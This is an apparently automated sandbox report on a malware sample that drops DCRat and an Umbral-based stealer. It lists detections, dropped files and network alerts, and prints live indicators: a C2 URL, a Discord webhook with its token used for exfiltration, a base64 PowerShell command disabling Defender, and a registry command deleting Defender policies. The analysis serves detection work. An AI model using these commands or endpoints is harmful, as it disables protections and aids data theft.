                        Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exeJoe Sandbox ML: detected
                        Source: C:\Windows\INF\.NET Data Provider for Oracle\SgrmBroker.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exeJoe Sandbox ML: detected
                        Source: C:\blockweb\portrefNet.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exeJoe Sandbox ML: detected
                        Machine Learning detection for sample
                        Source: FixTsDfhiC.exeJoe Sandbox ML: detected
                        Source: FixTsDfhiC.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                        Source: C:\blockweb\portrefNet.exeDirectory created: C:\Program Files\Windows Portable Devices\ukzoUeHPfeDwGdTDRNL.exe
                        Source: C:\blockweb\portrefNet.exeDirectory created: C:\Program Files\Windows Portable Devices\4811fe426320bd
                        Source: C:\blockweb\portrefNet.exeDirectory created: C:\Program Files\7-Zip\Lang\ukzoUeHPfeDwGdTDRNL.exe
                        Source: C:\blockweb\portrefNet.exeDirectory created: C:\Program Files\7-Zip\Lang\4811fe426320bd
                        Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Lunch LaCheat.exe, 00000022.00000003.1808515940.0000000004F74000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1824780821.0000000004CE1000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1805618598.000000000396E000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1823791845.0000000003966000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1807504603.0000000004CE9000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1823496476.00000000036D8000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1808928510.0000000005207000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1806529098.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1824009704.0000000003BF0000.00000004.00000020.00020000.00000000.sdmp, DCRatBuild.exe, 00000023.00000003.1807258543.0000000004D80000.00000004.00000020.00020000.00000000.sdmp, DCRatBuild.exe, 00000023.00000000.1805391607.0000000000763000.00000002.00000001.01000000.00000008.sdmp, DCRatBuild.exe, 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp, DCRatBuild.exe, 00000023.00000003.1808042217.0000000004E9A000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdbU.o. a._CorDllMainmscoree.dll source: portrefNet.exe, 0000002C.00000002.1947126022.00000000024A0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdb source: portrefNet.exe, 0000002C.00000002.1947126022.00000000024A0000.00000004.08000000.00040000.00000000.sdmp
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0073A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,35_2_0073A5F4
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0074B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,35_2_0074B8E0
                        Source: C:\blockweb\portrefNet.exeFile opened: C:\Users\user
                        Source: C:\blockweb\portrefNet.exeFile opened: C:\Users\user\Documents\desktop.ini
                        Source: C:\blockweb\portrefNet.exeFile opened: C:\Users\user\AppData
                        Source: C:\blockweb\portrefNet.exeFile opened: C:\Users\user\AppData\Local\Temp
                        Source: C:\blockweb\portrefNet.exeFile opened: C:\Users\user\Desktop\desktop.ini
                        Source: C:\blockweb\portrefNet.exeFile opened: C:\Users\user\AppData\Local

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.4:49745 -> 92.53.106.114:80
                        Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.4:49890 -> 92.53.106.114:80
                        Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.4:50013 -> 92.53.106.114:80
                        Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.4:49803 -> 92.53.106.114:80
                        Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.4:50016 -> 92.53.106.114:80
                        Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.4:50019 -> 92.53.106.114:80
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorURLs: http://cp91897.tw1.ru/@=MzY2MWOkV2N
                        Source: Malware configuration extractorURLs: https://discord.com/api/webhooks/1266665187293794356/BgUJDQi9QXAA0avjRcAiy-uTUWdbVUSk8SQjon--JNjDxPP5bEhE6DLfJFghJ_KLSRhA
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                        Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                        Source: unknownDNS query: name: ip-api.com
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficDNS traffic detected: DNS query: ip-api.com
                        Source: 52cheatand52rat.exe, 00000024.00000002.1876249048.00000239D5E8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                        Source: 52cheatand52rat.exe, 00000024.00000002.1874351610.00000239BD56E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gstatic.com
                        Source: 52cheatand52rat.exe, 00000024.00000002.1874351610.00000239BD5CA000.00000004.00000800.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000024.00000002.1874351610.00000239BD5B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                        Source: Lunch LaCheat.exe, 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1810385952.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
                        Source: 52cheatand52rat.exe, 00000024.00000002.1874351610.00000239BD5B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                        Source: Lunch LaCheat.exe, 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1810385952.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-
                        Source: 52cheatand52rat.exe, 00000024.00000002.1874351610.00000239BD548000.00000004.00000800.00020000.00000000.sdmp, portrefNet.exe, 0000002C.00000002.1947296388.000000000279D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://discord.com/api/v10/users/
                        Source: 52cheatand52rat.exe, 00000024.00000002.1874351610.00000239BD4C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1266665187293794356/BgUJDQi9QXAA0avjRcAiy-uTUWdbVUSk8SQjon--JNjDxPP
                        Source: Lunch LaCheat.exe, 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1810385952.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
                        Source: 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/Blank-c/Umbral-Stealer
                        Source: 52cheatand52rat.exe, 00000024.00000002.1874351610.00000239BD560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com
                        Source: 52cheatand52rat.exe, 00000024.00000002.1874351610.00000239BD4C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
                        Source: Lunch LaCheat.exe, 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1810385952.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://gstatic.com/generate_204e==================Umbral
                        Source: reg.exeProcess created: 50

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: 36.0.52cheatand52rat.exe.239bb8d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Source: 34.3.Lunch LaCheat.exe.1b56998.5.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Source: 34.2.Lunch LaCheat.exe.1b56998.1.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Source: 34.3.Lunch LaCheat.exe.1b56998.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Source: 34.2.Lunch LaCheat.exe.1b56998.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPEDMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Detected VMProtect packer
                        Source: Lunch LaCheat.exe.1.drStatic PE information: .vmp0 and .vmp1 section names
                        Windows Scripting host queries suspicious COM object (likely to drop second stage)
                        Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0073718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,35_2_0073718C
                        Source: C:\blockweb\portrefNet.exeFile created: C:\Windows\AppReadiness\dwm.exe
                        Source: C:\blockweb\portrefNet.exeFile created: C:\Windows\AppReadiness\6cb0b6c459d5d3
                        Source: C:\blockweb\portrefNet.exeFile created: C:\Windows\Performance\WinSAT\DataStore\ukzoUeHPfeDwGdTDRNL.exe
                        Source: C:\blockweb\portrefNet.exeFile created: C:\Windows\Performance\WinSAT\DataStore\4811fe426320bd
                        Source: C:\blockweb\portrefNet.exeFile created: C:\Windows\INF\.NET Data Provider for Oracle\SgrmBroker.exe
                        Source: C:\blockweb\portrefNet.exeFile created: C:\Windows\INF\.NET Data Provider for Oracle\91e168f4ec1147
                        Source: C:\blockweb\portrefNet.exeFile created: C:\Windows\Setup\State\ukzoUeHPfeDwGdTDRNL.exe
                        Source: C:\blockweb\portrefNet.exeFile created: C:\Windows\Setup\State\4811fe426320bd
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0073857B35_2_0073857B
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0073407E35_2_0073407E
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0075D00E35_2_0075D00E
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_007470BF35_2_007470BF
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0076119435_2_00761194
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_007502F635_2_007502F6
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0073E2A035_2_0073E2A0
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0073328135_2_00733281
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0074664635_2_00746646
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0075473A35_2_0075473A
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0075070E35_2_0075070E
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_007327E835_2_007327E8
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_007437C135_2_007437C1
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0073E8A035_2_0073E8A0
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0073F96835_2_0073F968
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0075496935_2_00754969
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_00746A7B35_2_00746A7B
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_00743A3C35_2_00743A3C
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0075CB6035_2_0075CB60
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_00750B4335_2_00750B43
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_00745C7735_2_00745C77
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_00743D6D35_2_00743D6D
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0073ED1435_2_0073ED14
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0074FDFA35_2_0074FDFA
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0073DE6C35_2_0073DE6C
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0073BE1335_2_0073BE13
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_00750F7835_2_00750F78
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_00735F3C35_2_00735F3C
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: String function: 0074ED00 appears 31 times
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: String function: 0074E360 appears 52 times
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: String function: 0074E28C appears 35 times
                        Source: FixTsDfhiC.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                        Source: FixTsDfhiC.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                        Source: 36.0.52cheatand52rat.exe.239bb8d0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: 34.3.Lunch LaCheat.exe.1b56998.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: 34.2.Lunch LaCheat.exe.1b56998.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: 34.3.Lunch LaCheat.exe.1b56998.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: 34.2.Lunch LaCheat.exe.1b56998.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, wiSwb7XyiTFNRrZRITR.csCryptographic APIs: 'TransformBlock'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, wiSwb7XyiTFNRrZRITR.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, ruGDE8wHCs1LugFJYDC.csCryptographic APIs: 'CreateDecryptor'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, ruGDE8wHCs1LugFJYDC.csCryptographic APIs: 'CreateDecryptor'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, wiSwb7XyiTFNRrZRITR.csCryptographic APIs: 'TransformBlock'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, wiSwb7XyiTFNRrZRITR.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, ruGDE8wHCs1LugFJYDC.csCryptographic APIs: 'CreateDecryptor'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, ruGDE8wHCs1LugFJYDC.csCryptographic APIs: 'CreateDecryptor'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, wiSwb7XyiTFNRrZRITR.csCryptographic APIs: 'TransformBlock'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, wiSwb7XyiTFNRrZRITR.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, ruGDE8wHCs1LugFJYDC.csCryptographic APIs: 'CreateDecryptor'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, ruGDE8wHCs1LugFJYDC.csCryptographic APIs: 'CreateDecryptor'
                        Source: 52cheatand52rat.exe.34.dr, --------.csBase64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
                        Source: 34.3.Lunch LaCheat.exe.1b56998.5.raw.unpack, --------.csBase64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
                        Source: 34.3.Lunch LaCheat.exe.1b56998.5.raw.unpack, --------.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 34.3.Lunch LaCheat.exe.1b56998.5.raw.unpack, --------.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, bUKS09MsXqrMAhvIgjN.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, bUKS09MsXqrMAhvIgjN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, bUKS09MsXqrMAhvIgjN.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, bUKS09MsXqrMAhvIgjN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 52cheatand52rat.exe.34.dr, --------.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 52cheatand52rat.exe.34.dr, --------.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, bUKS09MsXqrMAhvIgjN.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, bUKS09MsXqrMAhvIgjN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@87/43@1/1
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_00736EC9 GetLastError,FormatMessageW,35_2_00736EC9
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_00749E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,35_2_00749E1C
                        Source: C:\blockweb\portrefNet.exeFile created: C:\Program Files\Windows Portable Devices\ukzoUeHPfeDwGdTDRNL.exe
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\52cheatand52rat.exe.logJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
                        Source: C:\blockweb\portrefNet.exeMutant created: NULL
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeMutant created: \Sessions\1\BaseNamedObjects\kwtxO2R822Z9ihsGdQrR
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:824:120:WilError_03
                        Source: C:\blockweb\portrefNet.exeMutant created: \Sessions\1\BaseNamedObjects\Local\312f3abf7ba061ec8aad8e8d0a3ae626329305a1
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeFile created: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeJump to behavior
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockweb\file.vbs"
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCommand line argument: sfxname35_2_0074D5D4
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCommand line argument: sfxstime35_2_0074D5D4
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCommand line argument: STARTDLG35_2_0074D5D4
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCommand line argument: xjx35_2_0074D5D4
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
